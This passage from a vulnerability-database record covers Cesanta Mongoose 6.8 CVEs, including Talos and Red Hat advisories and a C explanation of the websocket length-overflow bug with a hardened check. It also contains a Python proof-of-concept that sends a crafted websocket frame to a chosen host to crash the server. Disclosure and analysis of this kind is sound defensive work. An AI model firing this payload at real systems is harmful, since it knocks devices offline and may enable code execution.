??:0\r\n #4 0x60200000efef (<unknown module>)\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)\r\nShadow bytes around the buggy address:\r\n0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\nAddressable: 00\r\nPartially addressable: 01 02 03 04 05 06 07\r\nHeap left redzone: fa\r\nHeap right redzone: fb\r\nFreed heap region: fd\r\nStack left redzone: f1\r\nStack mid redzone: f2\r\nStack right redzone: f3\r\nStack partial redzone: f4\r\nStack after return: f5\r\nStack use after scope: f8\r\nGlobal redzone: f9\r\nGlobal init order: f6\r\nPoisoned by user: f7\r\nContainer overflow: fc\r\nArray cookie: ac\r\nIntra object redzone: bb\r\nASan internal: fe\r\nLeft alloca redzone: ca\r\nRight alloca redzone: cb\r\n==88164==ABORTING\r\n```\r\n\r\n### Timeline\r\n* 2017-08-30 - Vendor Disclosure\r\n* 2017-10-31 - Public Release", "cvss3": {}, "published": "2017-11-08T00:00:00", "type": "seebug", "title": "Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability(CVE-2017-2921)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96808", 
"id": "SSV:96808", "sourceData": "\n import socket\r\nimport struct\r\nimport sys\r\nhttp_upgrade = ('GET /chat HTTP/1.1\\r\\n'\r\n 'Host: server.example.com\\r\\n'\r\n 'Upgrade: websocket\\r\\n'\r\n 'Connection: Upgrade\\r\\n'\r\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\r\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\r\n 'Sec-WebSocket-Version: 13\\r\\n'\r\n 'Origin: http://example.com\\r\\n\\r\\n')\r\n#only HTTP \"Upgrade: websocket\" header matters above, the above GET request was copied verbatim from wikipedia\r\n\r\n\r\npayload = \"\\x00\" # FIN flag doesn't matter, opcode doesn't matter\r\npayload += chr(0x80 | 127 ) # mask is set, payload len of 127 means next 64 bits are actual payload len\r\npayload_len = 0xffffffffffffffff -12 #actual payload len\r\npayload += struct.pack(\"!Q\",payload_len)\r\nmasking_key = 0 #masking key can be anything, and would need to be a specific value in real exploit\r\npayload += struct.pack(\"I\",masking_key)\r\npayload += \"A\"*40 #garbage to pad the packet\r\n\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1],int(sys.argv[2])))\r\ns.send(http_upgrade)\r\nprint s.recv(1024)\r\ns.send(payload)\r\nprint s.recv(1024)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96808", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2022-05-21T01:24:59", "description": "An exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:50:57", "type": "redhatcve", "title": "CVE-2017-2893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2022-05-20T23:50:57", "id": "RH:CVE-2017-2893", "href": "https://access.redhat.com/security/cve/cve-2017-2893", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-05-21T01:24:59", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. 
An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:55:38", "type": "redhatcve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2022-05-20T23:55:38", "id": "RH:CVE-2017-2921", "href": "https://access.redhat.com/security/cve/cve-2017-2921", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "talosblog": [{"lastseen": "2017-12-25T19:52:52", "description": "<i>These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos</i><br /><br />Today, Talos is disclosing several vulnerabilities that have been identified in Cesanta Mongoose server. <br /><br />Cesanta Mongoose is a library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms. 
The small size of the software enables any Internet-connected device to function as a web server. Mongoose is available under GPL v2 and commercial licenses.<br /> All these discovered vulnerabilities are fixed in version <a href=\"https://github.com/cesanta/mongoose/releases/tag/6.10\">6.10</a> of the library. <br /><br /><a name='more'></a><br /><br /><h2 id=\"h.t35gb7jnv6c3\">Vulnerability Details</h2><br /><h3 id=\"h.p7ist89g16m5\">TALOS-2017-0398 (CVE-2017-2891) - Cesanta Mongoose HTTP Server CGI Remote Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0398\">TALOS-2017-0398</a> manifests itself as an exploitable use-after-free vulnerability that exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of a previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.bm8o08jc6uoq\">TALOS-2017-0399 (CVE-2017-2892) - Cesanta Mongoose MQTT Payload Length Remote Code Execution</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0399\">TALOS-2017-0399</a> manifests itself as an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an out of bounds and arbitrary memory read and write, potentially resulting in information disclosure, denial of service and remote code execution. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.nlmk6epmqnt6\">TALOS-2017-0400 (CVE-2017-2893) - Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0400\">TALOS-2017-0400</a> describes an exploitable NULL pointer dereference vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to a server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.8tgqw5hpxxx3\">TALOS-2017-0401 (CVE-2017-2894) - Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0401\">TALOS-2017-0401</a> is an exploitable stack buffer overflow vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.cx86aeyjt9mm\">TALOS-2017-0402 (CVE-2017-2895) - Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0402\">TALOS-2017-0402</a> documents an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an out of bounds and arbitrary memory read potentially resulting in information disclosure and denial of service. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.cr2a58dhmjy1\">TALOS-2017-0416 (CVE-2017-2909) - Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0416\">TALOS-2017-0416</a> describes an infinite loop programming error that exists in the DNS server functionality of the Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and denial of service. An attacker can send a packet over the network to trigger this vulnerability. <br /><br /><h3 id=\"h.yl3fl4awfow9\">TALOS-2017-0428 (CVE-2017-2921) - Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0428\">TALOS-2017-0428</a> is an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow leading to a heap buffer overflow, resulting in denial of service and potentially remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br /><h3 id=\"h.dj3eivlw70fj\">TALOS-2017-0429 (CVE-2017-2922) - Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability</h3><br /><a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0429\">TALOS-2017-0429</a> describes an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers, which can lead to a use-after-free that can be exploited to achieve remote code execution. 
An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.<br /><br />For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:<br /><br /><a href=\"http://www.talosintelligence.com/vulnerability-reports/\">http://www.talosintelligence.com/vulnerability-reports/</a><br /><br /><h2 id=\"h.f31c7khmn6lo\">Discussion</h2><br />IoT devices often have limited processing and memory resources but they also require lightweight and resilient communications protocols. One of the protocols frequently used for IoT and mobile messaging applications is MQ Telemetry Transport (MQTT).<br /><br /><a href=\"http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html\">MQTT</a> is a lightweight network protocol used for publish/subscribe messaging between devices. MQTT is a standard protocol accepted by the OASIS consortium for the adoption of open standards. <br /><br />The protocol is designed to be open, simple and easy to implement, allowing thousands of lightweight clients to be supported by a single server. The design attempts to minimize bandwidth requirements while attempting to ensure reliability of delivery.<br /><br />Cesanta Mongoose is a popular communications library designed for implementation as a lightweight embedded library supporting several server and client application layer protocols, such as <a href=\"https://www.w3.org/Protocols/\">HTTP</a>, MQTT, <a href=\"https://www.w3.org/TR/2011/WD-websockets-20110929/\">WebSockets</a>, <a href=\"https://www.isc.org/community/rfcs/dns/\">DNS</a> and <a href=\"https://tools.ietf.org/html/rfc7252\">CoAP</a>. 
It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms.<br /><br />These vulnerabilities discovered by Talos may allow attackers to take over vulnerable versions of the Cesanta Mongoose server and control individual devices as well as the associated servers running it. Users are advised to work with the affected device vendors to ensure that the latest security patches for Cesanta Mongoose are applied to all vulnerable devices and applications. <br /><br /><h2 id=\"h.610e9o9vgbc4\">Coverage</h2><br />The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <br /><br /><ul><li>23039 - 23040</li></ul>", "cvss3": {}, "published": "2017-10-31T08:12:00", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Vulnerabilities in Cesanta Mongoose Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-2891", "CVE-2017-2892", "CVE-2017-2893", "CVE-2017-2894", "CVE-2017-2895", "CVE-2017-2909", "CVE-2017-2921", "CVE-2017-2922"], "modified": "2017-10-31T15:59:27", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/geK06cY9cxs/vulnerability-spotlight-multiple_31.html", "id": "TALOSBLOG:BF9B74979C194FA29647576078478DE0", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}
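The bug class behind TALOS-2017-0428 (CVE-2017-2921), a packet-length integer overflow that turns into a heap buffer overflow, as an added example in C. This is not Mongoose's code and not Talos's proof of concept: it is a generic RFC 6455 frame-header decoder, the unchecked header-plus-payload sum that a peer-declared 64-bit length can wrap to a tiny value (so a "does the whole frame fit" test passes and a far-too-small buffer gets allocated for a copy driven by the huge declared length), and the checked version that rejects lengths violating RFC 6455 (high bit set, non-minimal encoding), exceeding a policy cap, or overflowing the addition. The sample frames are constructed here (the masked "Hello" frame is the one in RFC 6455 section 5.7); the function names, the max_payload cap, and doing the arithmetic in uint64_t are assumptions of the example and say nothing about where exactly the overflow sat in Mongoose 6.8.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum { WS_OK = 0, WS_NEED_MORE = 1 };

struct ws_header {
    uint64_t header_len;   /* 2..14: base header, extended length, masking key */
    uint64_t payload_len;  /* length declared by the peer; not yet trusted */
    uint8_t  len_code;     /* the 7-bit length field: <126, 126 or 127 */
    int      fin, masked;
    uint8_t  opcode;
};

/* Decode an RFC 6455 frame header from buf[0..len). Reports only what the
 * peer claims; the caller must bound payload_len before allocating. */
static int ws_decode_header(const uint8_t *buf, size_t len, struct ws_header *h)
{
    if (len < 2) return WS_NEED_MORE;
    h->fin      = (buf[0] & 0x80) != 0;
    h->opcode   =  buf[0] & 0x0f;
    h->masked   = (buf[1] & 0x80) != 0;
    h->len_code =  buf[1] & 0x7f;
    uint64_t plen = h->len_code, hlen = 2;
    if (h->len_code == 126) {                 /* 16-bit extended length */
        if (len < 4) return WS_NEED_MORE;
        plen = ((uint64_t)buf[2] << 8) | buf[3];
        hlen = 4;
    } else if (h->len_code == 127) {          /* 64-bit extended length */
        if (len < 10) return WS_NEED_MORE;
        plen = 0;
        for (int i = 2; i < 10; i++) plen = (plen << 8) | buf[i];
        hlen = 10;
    }
    if (h->masked) hlen += 4;                 /* 32-bit masking key follows */
    h->header_len  = hlen;
    h->payload_len = plen;
    return WS_OK;
}

/* The bug class (hypothetical, not Mongoose's code): header + payload summed in
 * a fixed width with no check. A declared length near the top of the range
 * wraps the sum to a tiny number; "total <= bytes buffered" then passes and a
 * small buffer is allocated for a copy driven by the huge payload_len. */
uint64_t ws_frame_len_unchecked(const uint8_t *buf, size_t len)
{
    struct ws_header h;
    if (ws_decode_header(buf, len, &h) != WS_OK) return 0;
    return h.header_len + h.payload_len;      /* wraps modulo 2^64 */
}

/* Hardened: total frame length, or 0 if the header is incomplete, the
 * declared length breaks RFC 6455, exceeds max_payload, or would wrap. */
uint64_t ws_frame_len_checked(const uint8_t *buf, size_t len, uint64_t max_payload)
{
    struct ws_header h;
    if (ws_decode_header(buf, len, &h) != WS_OK) return 0;
    if (h.payload_len >> 63) return 0;                        /* RFC 6455 5.2: MSB must be 0 */
    if (h.len_code == 126 && h.payload_len < 126) return 0;   /* non-minimal encoding */
    if (h.len_code == 127 && h.payload_len < 65536) return 0;
    if (h.payload_len > max_payload) return 0;                /* server policy cap */
    if (h.payload_len > UINT64_MAX - h.header_len) return 0;  /* addition would wrap */
    return h.header_len + h.payload_len;
}

/* Constructed sample frames (headers only; payload bytes are not needed). */
const uint8_t ws_sample_hello[]   = { 0x81, 0x85, 0x37, 0xfa, 0x21, 0x3d,   /* masked "Hello", RFC 6455 5.7 */
                                      0x7f, 0x9f, 0x4d, 0x51, 0x58 };
const uint8_t ws_sample_len16[]   = { 0x82, 0x7e, 0x01, 0x00 };             /* binary, 256-byte payload */
const uint8_t ws_sample_crafted[] = { 0x82, 0x7f, 0xff, 0xff, 0xff, 0xff,   /* declares 0xFFFFFFFFFFFFFFFE */
                                      0xff, 0xff, 0xff, 0xfe };

int main(void)
{
    const uint64_t cap = 1u << 20;   /* assumed 1 MiB policy cap */
    printf("hello   checked=%" PRIu64 "\n",
           ws_frame_len_checked(ws_sample_hello, sizeof ws_sample_hello, cap));
    printf("len16   checked=%" PRIu64 "\n",
           ws_frame_len_checked(ws_sample_len16, sizeof ws_sample_len16, cap));
    printf("crafted unchecked=%" PRIu64 " checked=%" PRIu64 "\n",
           ws_frame_len_unchecked(ws_sample_crafted, sizeof ws_sample_crafted),
           ws_frame_len_checked(ws_sample_crafted, sizeof ws_sample_crafted, cap));
    return 0;
}
```

The crafted frame declares a payload of 0xFFFFFFFFFFFFFFFE bytes; the unchecked sum with its 10-byte header wraps to 8, which is exactly the shape of check that lets a heap allocation come out far smaller than the copy that follows. On the 32-bit targets typical of IoT the same wrap happens with much smaller declared lengths once the 64-bit field is truncated into a size_t, so the policy cap and the pre-addition overflow test both matter, not just the RFC high-bit rule.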